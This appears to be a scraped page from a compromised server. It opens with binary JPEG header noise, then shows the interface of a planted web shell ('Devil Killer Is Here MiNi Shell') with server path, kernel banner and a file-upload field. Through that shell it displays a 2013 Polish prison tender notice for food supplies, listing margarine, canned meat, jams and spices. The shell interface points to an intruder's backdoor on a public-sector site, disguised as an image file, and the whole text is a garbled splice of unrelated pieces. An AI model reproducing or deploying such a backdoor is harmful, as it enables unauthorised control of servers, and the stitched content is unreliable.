JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130103/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130103/3920-N-2013.html

<p class="kh_header"><b>Sieradz: Dostawy artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 3920 - 2013; data zamieszczenia: 03.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , ul. Orzechowa 5, 98-200 Sieradz, woj. łódzkie, tel. 043 8270600, faks 043 8270621.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zk_sieradz@sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy do Zakładu Karnego w Sieradzu następujących rodzajów artykułów spożywczych: Część 1 - Margaryna: 
1) Margaryna do smarowania pieczywa (kostki 0,200 kg) PN-92/A-86907, CPV 15431100-9 - 18000 kg;
Część 2 - Konserwy mięsne: 
1) Konserwa turystyczna z samootwieraczem (1 szt. do 300 g), PN-A-82022, CPV 15131000-5 - 2500 kg;
2) Konserwa przysmak śniad. z samootwieraczem (1 szt. do 300 g), PN-A-82022, CPV 15131000-5 -  2500 kg;
3) Konserwa pasztet mazowiecki z samootwier. (1szt. do 300 g), PN-98-A/82022, CPV 15131000-5 -  2500 kg;
4) Szynka mielona drobiowa (alupak 75 g - 135 g), PN-A-82022, CPV 15131000-5 - 650 kg;
5) Pasztet drobiowy z pieczarkami (alupak 75 g - 135 g), PN-98-A/82022, CPV 15131000-5 - 600 kg;
Część 3 - Dżemy: 
1) Dżem wielosmakowy - mix - porcyjny (1 szt. - 25g - 100 g), PN-A-75100, CPV 15332290-3 - 100 kg;
2) Dżem ze śliwek nisko słodzony (opak.10-15 kg), PN-A-75100, CPV 15332290-3 - 1200 kg;
3) Dżem truskawkowy nisko słodzony (opak. 10 - 15 kg), PN-A-75100, CPV 15332296-5 - 1200 kg;
4) Dżem wiśniowy nisko słodzony (opak. 10 - 15 kg), PN-A-75100, CPV 15332294-1 - 1200 kg;
5) Dżem z czarnej porzeczki nisko słodzony (opak. 10 - 15 kg), PN-A-75100, CPV 15332293-4 - 1200 kg;
6) Dżem brzoskwiniowy nisko słodzony (opak. 10 - 15 kg), PN-A-75100,CPV 15332293-4 - 1200 kg;
7) Marmolada wieloowocowa nisko słodzona (opak. 10-15 kg), PN-93/A/75103, CPV 15332230-5 -  2000 kg;
Część 4 - Pozostałe artykuły spożywcze: 
1) Papryka mielona ostra (opakowanie 0,5 - 5 kg), PN-A-86955, CPV 15331136-9 - 20 kg;
2) Papryka mielona słodka (opakowanie 0,5-5 kg), PN-A-86955, CPV 15331136-9 - 20 kg;
3) Ocet 10% (butelka 0,5 - 1 litr), PN-A-79733, CPV 15871110-8 - 150 l;
4) Musztarda popularna (opakowanie 1 - 10 kg), PN-A-86964, CPV 15871250-1 - 800 kg;
5) Ketchup (opakowanie 1 - 10 kg), PN-A-82013, CPV 15871230-5 - 800 kg;
6) Majonez (opakowanie 1 - 10 kg), PN-A-86950, CPV 15871273-8 - 400 kg;
7) Chrzan tarty w occie (opakowanie 1 - 10 kg), PN-A-77806, CPV 15331400-1 - 600 kg;
8) Majeranek (opakowanie 0,5 - 5 kg), PN-A-86958, CPV 15872300-4 - 60 kg;
9) Liść laurowy (opakowanie 0,5 - 5 kg), BN-65/8132-10, CPV 15890000-3 - 40 kg;
10) Bazylia (opakowanie 0,5 - 5 kg), PN-A-86959, CPV 15872000-1 - 20 kg;
11) Czosnek w kostce (opakowanie 0,5 - 5 kg), PN-R-75518, CPV 15872200-3 - 20 kg;
12) Kwasek cytrynowy (opakowanie 0,5 - 5 kg), PN-81/A-79734, CPV 15890000-3 - 60 kg;
13) Kawa zbożowa (opakowanie 0,25 - 0,5 kg), PN-A-94013, CPV 15613000-8 - 300 kg;
14) Herbata indyjska granulowana, PN-ISO-3720, CPV 15863000-5 - 700 kg;
15) Sos grzybowy koncentrat (opak. do 25 kg), PN-A-94050, CPV 15893100-5 - 300 kg;
16) Sos pieczarkowy koncentrat (opak. do 5 kg) PN-A-94050, CPV 15893100-5 - 300 kg;
17) Sos biały koncentrat (opakowanie do 5 kg), PN-A-94050, CPV 15893100-5 - 300 kg;
18) Sos cygański koncentrat (opakowanie do 5 kg), PN-A-94050, CPV 15893100-5 - 300 kg;
19) Zupa pieczarkowa koncentrat do gotowania (opak. do 15 kg) PN-A-94050, CPV 15891400-4 -  400 kg;
20) Zupa barszcz czerwony koncentrat do gotowania (opak. do 15 kg) PN-A-94050, CPV 15891400-4  - 200 kg;
21) Zupa barszcz biały - koncentrat w płynie (opak. do 1,5 l), PN-A-94050, CPV 15891400-4 - 150 l;
22) Żur - koncentrat w płynie (opak. do 1,5 l), PN-A-94050, CPV 15891400-4 - 150 l;
23) Żurek koncentrat do gotowania (opak. do 15 kg) PN-A-94050, CPV 15891400-4 - 400 kg;
24) Rosół jarzynowy koncentrat (opak. do 5 kg) PN-A-94052, CPV 15891900-9 - 500 kg;
25) Rosół z kury koncentrat (opakowanie do 5 kg), PN-A-94052, CPV 15891100-1 - 500 kg;
26) Kostka rosołowa - bulion drobiowy (opak. do 1 kg), PN-A-94052, CPV 15891500-5 - 200 kg;
27) Kostka rosołowa - bulion wołowy (opak. do 1 kg), PN-A-94052, CPV 15891500-5 - 200 kg;
28) Przyprawa do bigosu (opakowanie 0,5 - 5 kg), PN-A-86955, CPV 15894000-1 - 25 kg;
29) Przyprawa do fasoli (opakowanie 0,5 - 5 kg), PN-A-86955, CPV 15894000-1 - 25 kg;
30) Przyprawa do zup (opakowanie 1 - 5 kg), PN-A-94052, CPV 15871270-7 - 400 kg;
31) Sól (worki od 1 kg do 25 kg), PN-86/c-84081, CPV 15872400-5 - 1900 kg;
32) Pieprz naturalny mielony (opak. 0,5 - 5 kg), BN-64/8132-05, CPV 15872100-2 - 95 kg;
33) Cynamon (opakowanie do 1 kg), PN-A-94051, CPV 15872200-3 - 20 kg;
34) Budyń waniliowy (opakowanie 5 - 25 kg), PN-A-94051, CPV 15851000-8 - 250 kg;
35) Budyń owocowy (opakowanie 5 - 25 kg), PN-A-94051, CPV 15851000-8 - 250 kg;
36) Budyń śmietankowy (opakowanie 5 - 25 kg), PN-A-94051, CPV 15851000-8 - 250 kg;
37) Budyń czekoladowy (opakowanie 5 - 25 kg), PN-A-94051, CPV 15851000-8 - 250 kg;
38) Mąka ziemniaczana (opakowanie 1 kg), PN-93/A-74710, CPV 15620000-0 - 200 kg;
39) Mąka pszenna typ 500 (opakowanie 1 - 25 kg), PN-91/A-74022, CPV 15612100-2 - 5000 kg;
40) Ryż (worki 5 - 25 kg), BN-85/8062-01, CPV 15611000-4 - 5000 kg;
41) Kasza manna (opakowanie 1 - 25 kg), PN-88/A-74036, CPV 15613000-8 - 400 kg;
42) Kasza jęczmienna drobna (worki do 25 kg), PN-87/A-74203, CPV 15613000-8 - 1200 kg;
43) Kasza jęczmienna gruba (worki do 25 kg), PN-87/A-74203, CPV 15613000-8 - 3000 kg;
44) Kasza gryczana palona (worki do 25 kg), PN-87/A-74203, CPV 15613000-8 - 1200 kg;
45) Płatki owsiane (worki do 25 kg), PN-82/A-74037, CPV 15613380-5 - 250 kg;
46) Bułka tarta (opakowanie 1 kg), PN-A-74113, CPV 15811500-1 - 200 kg;
47) Makaron rurka (opakowanie 5 - 50 kg), PN-93/A-741133, CPV 15851100-9 - 2000 kg;
48) Makaron świderek (opakowanie 5 - 50 kg), PN-A-74113, CPV 15851100-9 - 2000 kg;
49) Makaron muszelka (opakowanie 5 - 50 kg), PN-A-74113, CPV 15851100-9 - 2000 kg;
50) Makaron spaghetti (opakowanie 5 - 50 kg), PN-A-74113, CPV 15851100-9 - 2000 kg;
51) Kukurydza konserwowa puszka z samootwieraczem 0,5 - 5 kg lub słoik 0,5 - 1 litra, PN-ISO-6540, CPV 15331470-2 - 400 kg;
52) Groszek konserwowy puszka z samootwieraczem 0,5 - 5 kg lub słoik 0,5 - 1 litra, PN-81/R-65032, CPV 15331462-3 - 500 kg;
53) Szczaw konserwowy (opakowanie 1 - 3 kg), BN-79/8122-07, CPV 15331400-1 - 450 kg;
54) Koncentrat pomidorowy 30% (opak. 1 - 10 kg), PN-75/A-77601, CPV 15331427-6 - 3500 kg;
55) Granulat sojowy (opakowanie 5 - 25 kg), PN-75/R-65031, CPV 15331150-3 - 300 kg;
56) Kostka sojowa (opakowanie 5 - 25 kg), PN-75/R-65031, CPV 15331150-3	 - 350 kg;
57) Woda mineralna niegazowana (opak. do 1,5 l), Atest PZH, CPV 15981000-8 - 6500 l;
58) Olej uniwersalny (opakowanie 1 - 5 litrów), PN-86/A-86908, CPV 15411200-4 - 1500 l;
59) Fasola jednolita biała (worki do 25 kg), PN-75/R-65031, CPV 15331131-4 - 1500 kg;
60) Fasola Piękny Jaś (worki do 25 kg), PN-75/R-65031, CPV 15331131-4 - 1500 kg;
61) Miód pszczeli wielokwiatowy (1 szt. 25 - 100 g), PN-88/A-77626, CPV 15831600-8 - 30 kg;
62) Cukier (worki od 1 kg do 25 kg), PN-72/A-74850, CPV 15831200-4 - 6500 kg.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.43.11.00-9, 15.13.10.00-5, 15.83.12.00-4, 15.41.12.00-4, 15.61.10.00-4, 15.33.11.31-4, 15.85.11.00-9, 15.33.22.94-1, 15.86.30.00-5, 15.89.31.00-5, 15.89.14.00-4, 15.85.10.00-8, 15.61.30.00-8, 15.61.21.00-2, 15.33.14.27-6, 15.98.10.00-8, 15.87.12.30-5, 15.87.12.50-1, 15.87.12.73-8, 15.33.11.50-3, 15.89.31.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca potwierdzi spełnienie warunku składając oświadczenie o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych. 
Ocena spełnienia w/w warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia, na podstawie złożonego przez wykonawcę oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca potwierdzi spełnienie warunku składając oświadczenie o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych. 
Ocena spełnienia w/w warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia, na podstawie złożonego przez wykonawcę oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca potwierdzi spełnienie warunku składając oświadczenie o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych. 
Ocena spełnienia w/w warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia, na podstawie złożonego przez wykonawcę oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca potwierdzi spełnienie warunku składając oświadczenie o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych. 
Ocena spełnienia w/w warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia, na podstawie złożonego przez wykonawcę oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca potwierdzi spełnienie warunku składając oświadczenie o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy Prawo zamówień publicznych. 
Ocena spełnienia w/w warunku zostanie dokonana zgodnie z formułą spełnia - nie spełnia, na podstawie złożonego przez wykonawcę oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany ceny w przypadku zmiany stawki podatku VAT, odpowiednio do zmiany stawki podatkowej</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny w Sieradzu, 98-200 Sieradz, ul. Orzechowa 5.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.01.2013 godzina 09:30, miejsce: Zakład Karny w Sieradzu, 98-200 Sieradz, ul. Orzechowa 5 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Margaryna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Margaryna do smarowania pieczywa (kostki 0,200 kg) PN-92/A-86907, CPV 15431100-9 - 18000 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.43.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Konserwy mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Konserwa turystyczna z samootwieraczem (1 szt. do 300 g), PN-A-82022, CPV 15131000-5 - 2500 kg; 
2) Konserwa przysmak śniad. z samootwieraczem (1 szt. do 300 g), PN-A-82022, CPV 15131000-5 -  2500 kg; 
3) Konserwa pasztet mazowiecki z samootwier. (1szt. do 300 g), PN-98-A/82022, CPV 15131000-5 -  2500 kg; 
4) Szynka mielona drobiowa (alupak 75 g - 135 g), PN-A-82022, CPV 15131000-5 - 650 kg; 
5) Pasztet drobiowy z pieczarkami (alupak 75 g - 135 g), PN-98-A/82022, CPV 15131000-5	 - 600 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dżemy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Dżem wielosmakowy - mix - porcyjny (1 szt. - 25g - 100 g), PN-A-75100, CPV 15332290-3 - 100 kg; 
2) Dżem ze śliwek nisko słodzony (opak.10-15 kg), PN-A-75100, CPV 15332290-3 - 1200 kg; 
3) Dżem truskawkowy nisko słodzony (opak. 10 - 15 kg), PN-A-75100, CPV 15332296-5 - 1200 kg; 
4) Dżem wiśniowy nisko słodzony (opak. 10 - 15 kg), PN-A-75100, CPV 15332294-1 - 1200 kg; 
